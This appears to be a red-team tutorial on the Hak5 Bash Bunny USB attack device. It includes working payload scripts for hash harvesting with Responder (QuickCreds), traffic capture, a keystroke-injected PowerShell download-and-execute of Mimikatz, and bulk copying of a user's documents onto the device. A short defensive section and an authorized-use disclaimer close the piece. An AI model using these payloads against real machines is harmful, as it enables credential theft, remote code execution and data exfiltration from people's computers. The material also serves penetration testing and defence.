Bash Bunny: Multi-Vector USB Attacks for Red Team Professionals

The USB Rubber Ducky is a keyboard. The Bash Bunny is a computer. While the Ducky executes keystroke sequences, the Bash Bunny runs full Linux payloads — combining multiple USB device classes simultaneously to execute sophisticated multi-stage attacks that no single-function tool can match.

What Is the Bash Bunny?

The Bash Bunny is a USB attack platform manufactured by Hak5. Internally, it runs a full Debian Linux system on an ARM processor. When connected to a target computer, it can simultaneously present as:

• A USB keyboard (HID)
• A network adapter (RNDIS/CDC-ECM Ethernet)
• A USB storage device (Mass Storage)
• A serial device (CDC-ACM)

This multi-class capability is what separates the Bash Bunny from simpler HID attack tools. A payload can type keystrokes, exfiltrate files over a dedicated network connection, and run a network service — all at the same time.

Hardware Specifications

• Processor: Cortex-A7 quad-core (Allwinner H3)
• RAM: 512 MB DDR3
• Storage: 8 GB flash (expandable via USB)
• OS: Debian Linux (ARM)
• Interface: USB 3.0 Type-A
• Arming mode: Physical switch (position 1, 2, arming)

Attack Modes and Payloads

QuickCreds — Credential Harvesting via LLMNR Poisoning

QuickCreds is arguably the Bash Bunny's signature capability. The attack flow:

1. Bash Bunny presents as an Ethernet adapter — Windows prioritizes it as the network gateway
2. Responder starts on the Bash Bunny, listening for LLMNR/NBT-NS/mDNS queries
3. Windows automatically authenticates to network resources — sending NetNTLMv2 hashes to Responder
4. Hashes are saved to the Bash Bunny's loot directory

# switch1/payload.txt
ATTACKMODE RNDIS_ETHERNET
LED ATTACK
HOST_IP 172.16.64.1
RESPONDER_OPTIONS "-wrf"
RUN /tools/responder/Responder.py -I usb0 $RESPONDER_OPTIONS
LED FINISH
EXFIL

The entire attack runs in 30-60 seconds. The harvested hashes can be cracked offline with Hashcat or relayed for NTLM relay attacks.

Network Tap — Passive Traffic Analysis

The Bash Bunny as a network tap: placed inline between a workstation and its Ethernet connection (or as the adapter), it can capture traffic:

ATTACKMODE RNDIS_ETHERNET
LED ATTACK
tcpdump -i usb0 -w /loot/capture.pcap &
sleep 60
LED FINISH
sync

In 60 seconds, you capture all network traffic from the target workstation — DNS queries, authentication attempts, unencrypted HTTP, mDNS broadcasts. This is often more valuable than raw credential capture because it reveals the network architecture and application behavior.

Mimikatz via HID

Combining keyboard injection with the Bash Bunny's Linux environment:

ATTACKMODE HID STORAGE
LED ATTACK
QUACK DELAY 1000
QUACK GUI x
QUACK DELAY 500
QUACK STRING a
QUACK DELAY 1000
QUACK STRING powershell -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('http://172.16.64.1/mimikatz_runner.ps1')"
QUACK ENTER

The Bash Bunny serves the PowerShell script over its own network adapter (172.16.64.1 is the Bash Bunny's default IP), downloads and executes Mimikatz, and retrieves the output.

Exfiltration via Storage

Large-scale data exfiltration using the storage mode:

ATTACKMODE HID STORAGE
QUACK GUI r
QUACK DELAY 500
QUACK STRING cmd /c robocopy "C:Users%USERNAME%Documents" E:lootdocs /E /NFL /NDL /NJH /NJS /nc /ns /np
QUACK ENTER

The Bash Bunny appears as drive E: — files copy directly to the device.

Payload Development

The Bash Bunny Framework

Payloads are shell scripts placed in /payloads/switch1/ or /payloads/switch2/. The physical switch selects which payload runs.

Key environment variables:

• $HOST_IP — Bash Bunny's IP on the target network


• $TARGET_IP — Target's IP address


• $SWITCH_POSITION — Which switch position is active

LED Status System

LED SETUP         # Magenta - Setup phase
LED ATTACK        # Yellow blink - Attack running
LED STAGE1        # Red blink - Stage 1
LED STAGE2        # Red/Yellow blink - Stage 2
LED FINISH        # Green - Complete
LED FAIL          # Red - Error

WAIT_FOR_ACTIVE_SESSION

A critical timing function:

WAIT_FOR_ACTIVE_SESSION 30

Waits for a user session to be active before executing — ensures the payload runs against a logged-in user rather than at the login screen.

Arming Mode

To modify payloads:

1. Switch to arming position (position 3)


2. Connect to computer — Bash Bunny presents as mass storage


3. Edit files directly on the device


4. Safely eject


5. Switch back to attack position

The arming mode also provides SSH access:

screen /dev/ttyACM0 115200

Payload Library

Hak5 maintains an extensive community payload library on GitHub. Categories include:

• Credential harvesting — QuickCreds, Responder-based attacks


• Exfiltration — Documents, credentials, SSH keys


• Persistence — Scheduled tasks, registry modifications


• Reconnaissance — Network scanning, system enumeration


• Execution — PowerShell one-liners, DLL injection

Each payload is documented with requirements, target OS, attack duration, and expected output.

Defensive Considerations

For your assessment reports:

• USB device control policies — Group Policy can restrict USB device class installation
• LLMNR/NBT-NS disable — Prevents QuickCreds-style hash capture (disable in Group Policy)
• Network device registration — Endpoint management can detect unauthorized network adapters
• Physical security — Unattended workstation policy is the root cause defense

Conclusion

The Bash Bunny represents the current ceiling of USB attack capability in a commercial tool. Its Linux internals mean any tool that runs on Linux can be a Bash Bunny payload — Nmap, Metasploit, custom Python scripts, and beyond.

In authorized red team engagements, it demonstrates the severity of physical access in a way that's hard to argue with: 60 seconds of USB access, credentials harvested, done.

For authorized penetration testing and red team operations only. Misuse is illegal.